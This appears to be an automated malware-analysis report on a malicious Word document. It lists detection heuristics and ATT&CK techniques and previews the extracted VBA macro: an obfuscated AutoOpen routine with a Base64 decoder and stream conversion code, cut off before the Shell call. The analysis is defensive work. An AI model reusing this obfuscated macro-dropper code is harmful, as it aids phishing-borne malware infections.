MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes CreateObject and Shell() to execute a Base64-decoded PowerShell command stager, indicating a downloader or initial execution stage. The presence of the Shell() call and the specific PowerShell command stager strongly suggests a malicious intent to download and execute further payloads.
Heuristics 9
-
ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17206 bytes |
SHA-256: 25cda99f1d0da8e79aae1be61bd1c1c26d1f5fc7438cb7d36e1e8e32df705722 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim swJD1aP6 As Boolean
swJD1aP6 = False
Dim lBfdQi As Double
lBfdQi = 62663.258433826
Dim Wa87uf As Boolean
Wa87uf = True
F8dva
End Sub
Attribute VB_Name = "Module2"
Public Function dD3ilQO(ByVal jTfWg)
Dim uu0pN7FDU As Byte
uu0pN7FDU = 113
Dim Xzvd2yBaA As Long
Xzvd2yBaA = -1374405482
Dim h3P6Zb As Single
h3P6Zb = Round(1262.4193239549)
Dim lMiNa4Su
Dim oLIQF2b
Dim U6xgET8 As Integer
U6xgET8 = Sgn(19223)
Dim iHc1oKW5j As Long
iHc1oKW5j = -1493592986
Dim FC1JkWL As Byte
FC1JkWL = 82
Dim tYC3wJ As Integer
tYC3wJ = Sgn(-22457)
Dim MydfL As Integer
MydfL = -21598
Dim G0SbnABF As Long
G0SbnABF = -1929898222
Set lMiNa4Su = CreateObject(xdhpXcO)
Dim wjx93n As Single
wjx93n = Round(34461.076033849)
Dim QDxhwk As Byte
QDxhwk = 212
Dim OQjBbkd As Double
OQjBbkd = Sgn(29356.940918728)
Dim vy98u As Integer
vy98u = 23865
Dim NY03x As Double
NY03x = 11504.587200717
Set oLIQF2b = lMiNa4Su.CreateElement(EpntLR)
Dim kXyjTQ3Z As Byte
kXyjTQ3Z = 170
Dim iNSaL4m As Single
iNSaL4m = 7200.9092840894
Dim NbYD5Md As String
NbYD5Md = vbNullString
Dim QduHA
QduHA = StrConv(H753JO, vbProperCase)
Dim VVEgaZ As Single
VVEgaZ = Sgn(49957.282412604)
With oLIQF2b
Dim B8JS7 As Long
B8JS7 = Sgn(0)
Dim rboz9Q2 As Byte
rboz9Q2 = 252
Dim U0v31Zs As Integer
U0v31Zs = -9722
oLIQF2b.DataType = "bin." & EpntLR
Dim m2CjTOZU As Long
m2CjTOZU = Sgn(0)
Dim e1pqcxfG As Double
e1pqcxfG = Round(879.62519730969)
oLIQF2b.Text = jTfWg
End With
Dim GkAwVy6 As Boolean
GkAwVy6 = True
Dim NtNc4kiPK As Byte
NtNc4kiPK = 137
Dim JV5lb As Long
JV5lb = Sgn(0)
dD3ilQO = MM9AP6(oLIQF2b.nodeTypedValue)
Dim daj2l
daj2l = Len(HTkePM3u)
Dim tLu4H As Integer
tLu4H = 30944
Set oLIQF2b = Nothing
Set lMiNa4Su = Nothing
End Function
Function MM9AP6(Binary)
Dim z8IMRmy As Long
z8IMRmy = Sgn(-970809712)
Dim EN0SAehaD As Single
EN0SAehaD = 46363.8290906
Dim uYvOS6 As Long
uYvOS6 = 0
Const C649c = 2
Const J5JkQwUVM = 1
Dim XHmQSZEk As Byte
XHmQSZEk = 202
Dim uoEb17jua As Boolean
uoEb17jua = True
Dim MR0sldcev As Long
MR0sldcev = Sgn(-929278598)
Dim NJsZjnU
Dim KgJfKDVGs As Byte
KgJfKDVGs = 52
Dim mhv0TFsy As Integer
mhv0TFsy = 24825
Dim X7wmUiO
X7wmUiO = StrConv(jcVvbx3, vbLowerCase)
Dim AaFywq As Byte
AaFywq = 244
Dim N0kTfIy3 As Boolean
N0kTfIy3 = False
Dim WmM0afn1Z As Byte
WmM0afn1Z = 53
Dim PSTpd6G As Long
PSTpd6G = -508499954
Dim Sg4TO0H As String
Sg4TO0H = Val("J")
Set NJsZjnU = CreateObject("adodb.stream")
Dim et3CoV As Long
et3CoV = Sgn(0)
Dim uB7TMZfh As Single
uB7TMZfh = Sgn(44170.589517774)
Dim jtobmUkzA As Double
jtobmUkzA = 63178.085553038
Dim PActslhme As Double
PActslhme = Round(45035.594744317)
With NJsZjnU
Dim klC62ZQf As Double
klC62ZQf = Sgn(14030.460836578)
Dim vy0efUGx As Long
vy0efUGx = Sgn(-1737644752)
Dim StAgI
StAgI = Asc("^")
Dim MA6fPR As String
MA6fPR = vbNullString
.Type = J5JkQwUVM
Dim rWpzVO As Double
rWpzVO = Fix(31693.630577065)
Dim g7ywe0cz As Double
g7ywe0cz = Round(39036.616020474)
.Open
Dim AAhtxa2fF As Single
AAhtxa2fF = Sgn(25611.007985664)
Dim HPO2Deafh
HPO2Deafh = ""
Dim MAMgEJ As Boolean
MAMgEJ = True
Dim tkA28h As Boolean
tkA28h = False
Dim NqXM5fk As Double
NqXM5fk = Sgn(50204.09539515)
.Write Binary
Dim OkzyQm As Long
OkzyQm = Sgn(0)
Dim M4CKa As String
M4CKa = StrConv(vTvcDSCFQ, vbProperCase)
.Position = 0
Dim O3tYkhKsM As Integer
O3tYkhKsM = -27842
Dim gBgZc24F As Single
gBgZc24F = 43034.963077576
.Type = C649c
Dim f2Pcx As Double
f2Pcx = Val(55913.562171349)
Dim yonlON As Boolean
yonlON = True
Dim P1XqQe As Double
P1XqQe = Sgn(29368.821322486)
Dim hB83bq5mK As Byte
hB83bq5mK = 176
Dim t6TRIL21g As Boolean
t6TRIL21g = True
Dim mexRF As Do
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.